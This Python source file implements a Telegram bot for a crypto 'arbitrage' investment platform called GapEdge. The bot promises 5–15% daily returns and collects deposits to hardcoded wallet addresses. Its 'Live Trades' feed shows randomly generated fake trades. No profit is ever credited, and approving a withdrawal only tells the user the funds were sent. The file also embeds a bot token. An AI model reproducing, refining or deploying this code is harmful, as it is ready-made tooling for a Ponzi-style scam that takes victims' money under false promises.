#!/usr/bin/env python3
# ================================================
#  Profit edge Telegram Bot
#  Generated by ProfitEdge Bot Generator
#  Deploy on Railway.app for free 24/7 hosting
# ================================================

import telebot
import json
import os
import random
import string
from datetime import datetime

# CONFIG
BOT_TOKEN = "8599181842:AAEY1pmVQMEZltxH4mGoKt4peob7aeDC_eA"
ADMIN_ID = 7209896142
PLATFORM_NAME = "GapEdge"
PLATFORM_URL = "https://gapedge.netlify.app"
SUPPORT_USERNAME = "@GapEdgeSupport"
MIN_DEPOSIT = 500

WALLETS = {
    "BTC": "bc1qdgsavxqlvev0v29vmhlns5yaysc0qf23thxkxf",
    "ETH": "0xB9d68488302854649ea7636055c433d27Decb11c",
    "USDT": "TYKqDw8RCjF9iwfTAybAmMeg7QwgP57e87",
    "USDC": "0xB9d68488302854649ea7636055c433d27Decb11c",
    "SOL": "8GP6mmzEUwM4mcB36xxxX2cbySmnJPVqRLZUfGLA5CWx"
}

PLANS = [
    {"name": "Starter", "min": 500, "max": 4999, "daily": 5},
    {"name": "Growth", "min": 5000, "max": 19999, "daily": 7},
    {"name": "Elite", "min": 20000, "max": 99999, "daily": 10},
    {"name": "Platinum", "min": 100000, "max": 999999999, "daily": 15}
]

PLANS_DISPLAY = "Starter Plan: $500 - $4,999 | 5% daily | On $1000 = $50/day\nGrowth Plan: $5,000 - $19,999 | 7% daily | On $1000 = $70/day\nElite Plan: $20,000 - $99,999 | 10% daily | On $1000 = $100/day\nPlatinum Plan: $100,000 - Unlimited | 15% daily | On $1000 = $150/day"

DB_FILE = "users.json"

# DATABASE
def load_db():
    if os.path.exists(DB_FILE):
        with open(DB_FILE, "r") as f:
            return json.load(f)
    return {}

def save_db(db):
    with open(DB_FILE, "w") as f:
        json.dump(db, f, indent=2)

def get_user(user_id):
    db = load_db()
    uid = str(user_id)
    if uid not in db:
        db[uid] = {
            "id": uid, "name": "", "username": "",
            "balance": 0, "profit": 0, "total_earned": 0,
            "ref_bonus": 0, "deposits": [], "withdrawals": [],
            "ref_code": gen_ref_code(), "referred_by": None,
            "referrals": [], "joined": datetime.now().strftime("%Y-%m-%d")
        }
        save_db(db)
    return db[uid]

def save_user(user_id, data):
    db = load_db()
    db[str(user_id)] = data
    save_db(db)

def gen_ref_code():
    return "".join(random.choices(string.ascii_uppercase + string.digits, k=8))

def get_plan(balance):
    for plan in reversed(PLANS):
        if balance >= plan["min"]:
            return plan
    return None

def fmt(amount):
    return "${:,.2f}".format(amount)

# BOT
bot = telebot.TeleBot(BOT_TOKEN)

def main_menu():
    markup = telebot.types.InlineKeyboardMarkup(row_width=2)
    markup.add(
        telebot.types.InlineKeyboardButton("💰 Check Balance", callback_data="balance"),
        telebot.types.InlineKeyboardButton("📥 Make Deposit", callback_data="deposit"),
        telebot.types.InlineKeyboardButton("📤 Request Withdrawal", callback_data="withdraw"),
        telebot.types.InlineKeyboardButton("📊 Trade History", callback_data="history"),
        telebot.types.InlineKeyboardButton("🎁 Referral Link", callback_data="referral"),
        telebot.types.InlineKeyboardButton("📈 View Plans", callback_data="plans"),
        telebot.types.InlineKeyboardButton("💹 Live Trades", callback_data="live_trades"),
        telebot.types.InlineKeyboardButton("📞 Support", callback_data="support")
    )
    return markup

def admin_menu():
    markup = telebot.types.InlineKeyboardMarkup(row_width=2)
    markup.add(
        telebot.types.InlineKeyboardButton("👥 All Users", callback_data="admin_users"),
        telebot.types.InlineKeyboardButton("📥 Pending Deposits", callback_data="admin_deposits"),
        telebot.types.InlineKeyboardButton("📤 Pending Withdrawals", callback_data="admin_withdrawals"),
        telebot.types.InlineKeyboardButton("📊 Stats", callback_data="admin_stats"),
        telebot.types.InlineKeyboardButton("📢 Broadcast", callback_data="admin_broadcast")
    )
    return markup

@bot.message_handler(commands=["start"])
def start(message):
    user = get_user(message.from_user.id)
    user["name"] = message.from_user.first_name or "User"
    user["username"] = message.from_user.username or ""
    args = message.text.split()
    if len(args) > 1:
        ref_code = args[1]
        db = load_db()
        referrer = next((u for u in db.values() if u.get("ref_code") == ref_code and u["id"] != str(message.from_user.id)), None)
        if referrer and not user["referred_by"]:
            user["referred_by"] = referrer["id"]
            referrer.setdefault("referrals", []).append({"name": user["name"], "date": datetime.now().strftime("%Y-%m-%d"), "id": str(message.from_user.id)})
            save_user(referrer["id"], referrer)
    save_user(message.from_user.id, user)
    text = ("*Welcome to " + PLATFORM_NAME + "!*\n\n" +
            "Hello " + user["name"] + "! I am your personal trading assistant.\n\n" +
            PLATFORM_NAME + " automatically trades crypto arbitrage 24/7 and shares profits with you daily.\n\n" +
            "*Minimum Deposit:* $" + str(MIN_DEPOSIT) + "\n" +
            "*Daily Returns:* " + str(PLANS[0]["daily"]) + "% - " + str(PLANS[-1]["daily"]) + "%\n" +
            "*Website:* " + PLATFORM_URL + "\n\n" +
            "Use the menu below to get started:")
    bot.send_message(message.chat.id, text, parse_mode="Markdown", reply_markup=main_menu())

@bot.callback_query_handler(func=lambda call: True)
def callbacks(call):
    uid = call.from_user.id
    cid = call.message.chat.id
    user = get_user(uid)
    bot.answer_callback_query(call.id)

    if call.data == "balance":
        plan = get_plan(user["balance"])
        plan_text = plan["name"] + " Plan (" + str(plan["daily"]) + "%/day)" if plan else "No Active Plan"
        text = ("*" + PLATFORM_NAME + " Dashboard*\n\n" +
                "Name: " + user["name"] + "\n" +
                "Joined: " + user["joined"] + "\n\n" +
                "Total Balance: " + fmt(user["balance"]) + "\n" +
                "Available Profit: " + fmt(user["profit"]) + "\n" +
                "Total Earned: " + fmt(user["total_earned"]) + "\n" +
                "Referral Bonus: " + fmt(user["ref_bonus"]) + "\n\n" +
                "Active Plan: " + plan_text)
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "deposit":
        markup = telebot.types.InlineKeyboardMarkup(row_width=2)
        for coin in WALLETS:
            markup.add(telebot.types.InlineKeyboardButton("Send " + coin, callback_data="dep_" + coin))
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, "*Select coin to deposit:*\nMinimum: $" + str(MIN_DEPOSIT), parse_mode="Markdown", reply_markup=markup)

    elif call.data.startswith("dep_"):
        coin = call.data[4:]
        addr = WALLETS.get(coin, "N/A")
        text = ("*Deposit " + coin + "*\n\nSend *" + coin + "* to:\n\n`" + addr + "`\n\n" +
                "Only send " + coin + " to this address.\nAfter sending, click below to confirm.")
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("I Have Sent " + coin, callback_data="confirm_" + coin))
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="deposit"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data.startswith("confirm_"):
        coin = call.data[8:]
        msg = bot.send_message(cid, "How much " + coin + " did you send? (Enter USD amount)\nExample: 500")
        bot.register_next_step_handler(msg, lambda m: process_deposit(m, coin))

    elif call.data == "withdraw":
        if user["profit"] <= 0:
            bot.send_message(cid, "No profit available yet. Make a deposit first!", reply_markup=main_menu())
            return
        msg = bot.send_message(cid, "Available profit: " + fmt(user["profit"]) + "\nHow much would you like to withdraw?")
        bot.register_next_step_handler(msg, process_wd_amount)

    elif call.data == "history":
        deps = user.get("deposits", [])
        wds = user.get("withdrawals", [])
        dep_list = "\n".join(["- " + d["coin"] + " $" + str(d["amount"]) + " [" + d["status"].upper() + "] " + d["date"] for d in deps[-5:]]) or "No deposits yet"
        wd_list = "\n".join(["- $" + str(w["amount"]) + " in " + w["coin"] + " [" + w["status"].upper() + "] " + w["date"] for w in wds[-5:]]) or "No withdrawals yet"
        text = "*Trade History*\n\n*Deposits:*\n" + dep_list + "\n\n*Withdrawals:*\n" + wd_list
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "referral":
        bot_info = bot.get_me()
        ref_link = "https://t.me/" + bot_info.username + "?start=" + user["ref_code"]
        refs = user.get("referrals", [])
        text = ("*Your Referral Program*\n\n" +
                "Earn 5% bonus on every deposit from your referrals!\n\n" +
                "Your Link: " + ref_link + "\n" +
                "Your Code: `" + user["ref_code"] + "`\n\n" +
                "Total Referrals: " + str(len(refs)) + "\n" +
                "Referral Earnings: " + fmt(user["ref_bonus"]))
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "plans":
        text = "*" + PLATFORM_NAME + " Investment Plans*\n\n" + PLANS_DISPLAY
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Deposit Now", callback_data="deposit"))
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "live_trades":
        pairs = ["BTC/USDT", "ETH/USDT", "SOL/USDT", "BNB/USDT", "XRP/USDT"]
        exchanges = ["Binance", "Coinbase", "Kraken", "KuCoin"]
        trades = []
        for i in range(5):
            pair = random.choice(pairs)
            buy_ex = random.choice(exchanges)
            sell_ex = random.choice([e for e in exchanges if e != buy_ex])
            profit = round(random.uniform(0.1, 2.5), 3)
            trades.append(pair + ": Buy " + buy_ex + " Sell " + sell_ex + " | +" + str(profit) + "%")
        text = ("*Live Trades - " + PLATFORM_NAME + "*\n\n" +
                "Status: ACTIVE\n" +
                "Time: " + datetime.now().strftime("%H:%M:%S") + "\n\n" +
                "\n".join(trades) + "\n\nAll profits distributed automatically.")
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Refresh", callback_data="live_trades"))
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "support":
        text = ("*" + PLATFORM_NAME + " Support*\n\n" +
                "Support: " + SUPPORT_USERNAME + "\n" +
                "Website: " + PLATFORM_URL + "\n\n" +
                "Response time: Within 1 hour\n" +
                "Available: 24/7")
        markup = telebot.types.InlineKeyboardMarkup()
        markup.add(telebot.types.InlineKeyboardButton("Message Support", url="https://t.me/" + SUPPORT_USERNAME.replace("@", "")))
        markup.add(telebot.types.InlineKeyboardButton("Back", callback_data="menu"))
        bot.send_message(cid, text, parse_mode="Markdown", reply_markup=markup)

    elif call.data == "menu":
        bot.send_message(cid, "*" + PLATFORM_NAME + " Main Menu*", parse_mode="Markdown", reply_markup=main_menu())

    elif call.data == "admin_stats" and uid == ADMIN_ID:
        db = load_db()
        total_users = len(db)
        total_funds = sum(u.get("balance", 0) for u in db.values())
        pending_deps = sum(1 for u in db.values() for d in u.get("deposits", []) if d["status"] == "pending")
        pending_wds = sum(1 for u in db.values() for w in u.get("withdrawals", []) if w["status"] == "pending")
        text = ("*Admin Stats*\n\n" +
                "Total Users: " + str(total_users) + "\n" +
                "Total Funds: " + fmt(total_funds) + "\n" +
                "Pending Deposits: " + str(pending_deps) + "\n" +
                "Pending Withdrawals: " + str(pending_wds))
        bot.send_message(cid, text, parse_mode="Markdown")

    elif call.data == "admin_deposits" and uid == ADMIN_ID:
        db = load_db()
        pending = [(uid2, u, d) for uid2, u in db.items() for d in u.get("deposits", []) if d["status"] == "pending"]
        if not pending:
            bot.send_message(cid, "No pending deposits.")
            return
        for uid2, u, d in pending[:5]:
            text = "Deposit Request\n" + u["name"] + "\n$" + str(d["amount"]) + " " + d["coin"] + "\n" + d["date"]
            markup = telebot.types.InlineKeyboardMarkup(row_width=2)
            markup.add(
                telebot.types.InlineKeyboardButton("Approve", callback_data="appdep_" + uid2 + "_" + d["id"]),
                telebot.types.InlineKeyboardButton("Reject", callback_data="rejdep_" + uid2 + "_" + d["id"])
            )
            bot.send_message(cid, text, reply_markup=markup)

    elif call.data.startswith("appdep_") and uid == ADMIN_ID:
        parts = call.data.split("_")
        target_uid, dep_id = parts[1], parts[2]
        db = load_db()
        u = db.get(target_uid)
        if u:
            for d in u["deposits"]:
                if d["id"] == dep_id:
                    d["status"] = "approved"
                    u["balance"] += d["amount"]
                    if u.get("referred_by"):
                        ref = db.get(u["referred_by"])
                        if ref:
                            ref["ref_bonus"] = ref.get("ref_bonus", 0) + d["amount"] * 0.05
                            save_user(ref["id"], ref)
                    save_user(target_uid, u)
                    bot.send_message(cid, "Approved $" + str(d["amount"]) + " for " + u["name"])
                    bot.send_message(int(target_uid), "*Your deposit of $" + str(d["amount"]) + " has been approved! Your account is now active.*", parse_mode="Markdown")
                    break

    elif call.data.startswith("rejdep_") and uid == ADMIN_ID:
        parts = call.data.split("_")
        target_uid, dep_id = parts[1], parts[2]
        db = load_db()
        u = db.get(target_uid)
        if u:
            for d in u["deposits"]:
                if d["id"] == dep_id:
                    d["status"] = "rejected"
                    save_user(target_uid, u)
                    bot.send_message(cid, "Rejected deposit for " + u["name"])
                    bot.send_message(int(target_uid), "Your deposit was rejected. Contact support.")
                    break

    elif call.data == "admin_withdrawals" and uid == ADMIN_ID:
        db = load_db()
        pending = [(uid2, u, w) for uid2, u in db.items() for w in u.get("withdrawals", []) if w["status"] == "pending"]
        if not pending:
            bot.send_message(cid, "No pending withdrawals.")
            return
        for uid2, u, w in pending[:5]:
            text = "Withdrawal Request\n" + u["name"] + "\n$" + str(w["amount"]) + " in " + w["coin"] + "\nTo: " + w["address"][:30] + "..."
            markup = telebot.types.InlineKeyboardMarkup(row_width=2)
            markup.add(
                telebot.types.InlineKeyboardButton("Approve", callback_data="appwd_" + uid2 + "_" + w["id"]),
                telebot.types.InlineKeyboardButton("Reject", callback_data="rejwd_" + uid2 + "_" + w["id"])
            )
            bot.send_message(cid, text, reply_markup=markup)

    elif call.data.startswith("appwd_") and uid == ADMIN_ID:
        parts = call.data.split("_")
        target_uid, wd_id = parts[1], parts[2]
        db = load_db()
        u = db.get(target_uid)
        if u:
            for w in u["withdrawals"]:
                if w["id"] == wd_id:
                    w["status"] = "approved"
                    u["profit"] = max(0, u.get("profit", 0) - w["amount"])
                    save_user(target_uid, u)
                    bot.send_message(cid, "Approved $" + str(w["amount"]) + " withdrawal for " + u["name"])
                    bot.send_message(int(target_uid), "*Your withdrawal of $" + str(w["amount"]) + " has been sent!*", parse_mode="Markdown")
                    break

    elif call.data == "admin_users" and uid == ADMIN_ID:
        db = load_db()
        lines = [u["name"] + " - Bal: $" + str(u.get("balance", 0)) + " Profit: $" + str(round(u.get("profit", 0), 2)) for u in list(db.values())[:10]]
        bot.send_message(cid, "*All Users (" + str(len(db)) + ")*\n\n" + "\n".join(lines), parse_mode="Markdown")

    elif call.data == "admin_broadcast" and uid == ADMIN_ID:
        msg = bot.send_message(cid, "Type your broadcast message:")
        bot.register_next_step_handler(msg, send_broadcast)

def process_deposit(message, coin):
    try:
        amount = float(message.text.replace("$", "").replace(",", ""))
        if amount < MIN_DEPOSIT:
            bot.send_message(message.chat.id, "Minimum deposit is $" + str(MIN_DEPOSIT))
            return
        user = get_user(message.from_user.id)
        dep = {"id": str(random.randint(100000, 999999)), "coin": coin, "amount": amount, "status": "pending", "date": datetime.now().strftime("%Y-%m-%d")}
        user["deposits"].append(dep)
        save_user(message.from_user.id, user)
        bot.send_message(message.chat.id, "Deposit submitted! $" + str(amount) + " in " + coin + ". Admin will approve within 1-2 hours.", reply_markup=main_menu())
        bot.send_message(ADMIN_ID, "NEW DEPOSIT\n" + user["name"] + "\n$" + str(amount) + " " + coin + "\nUser ID: " + str(message.from_user.id))
    except ValueError:
        bot.send_message(message.chat.id, "Invalid amount.")

def process_wd_amount(message):
    try:
        amount = float(message.text.replace("$", "").replace(",", ""))
        user = get_user(message.from_user.id)
        if amount > user.get("profit", 0):
            bot.send_message(message.chat.id, "Insufficient profit. Available: " + str(round(user.get("profit", 0), 2)))
            return
        msg = bot.send_message(message.chat.id, "Which coin? Type: BTC, ETH, USDT, USDC or SOL")
        bot.register_next_step_handler(msg, lambda m: process_wd_coin(m, amount))
    except ValueError:
        bot.send_message(message.chat.id, "Invalid amount.")

def process_wd_coin(message, amount):
    coin = message.text.upper().strip()
    if coin not in WALLETS:
        bot.send_message(message.chat.id, "Invalid coin. Enter: BTC, ETH, USDT, USDC or SOL")
        return
    msg = bot.send_message(message.chat.id, "Enter your " + coin + " wallet address:")
    bot.register_next_step_handler(msg, lambda m: process_wd_address(m, amount, coin))

def process_wd_address(message, amount, coin):
    address = message.text.strip()
    user = get_user(message.from_user.id)
    wd = {"id": str(random.randint(100000, 999999)), "amount": amount, "coin": coin, "address": address, "status": "pending", "date": datetime.now().strftime("%Y-%m-%d")}
    user["withdrawals"].append(wd)
    save_user(message.from_user.id, user)
    bot.send_message(message.chat.id, "Withdrawal of $" + str(amount) + " in " + coin + " submitted. Processed within 24 hours.", reply_markup=main_menu())
    bot.send_message(ADMIN_ID, "NEW WITHDRAWAL\n" + user["name"] + "\n$" + str(amount) + " in " + coin + "\nAddress: " + address + "\nUser ID: " + str(message.from_user.id))

def send_broadcast(message):
    text = message.text
    db = load_db()
    count = 0
    for uid2 in db.keys():
        try:
            bot.send_message(int(uid2), text)
            count += 1
        except:
            pass
    bot.send_message(message.chat.id, "Broadcast sent to " + str(count) + " users.")

@bot.message_handler(commands=["admin"])
def admin_cmd(message):
    if message.from_user.id != ADMIN_ID:
        bot.send_message(message.chat.id, "Unauthorized.")
        return
    bot.send_message(message.chat.id, "*Admin Panel*", parse_mode="Markdown", reply_markup=admin_menu())

print("Profit edge Bot is running...")
bot.infinity_polling()
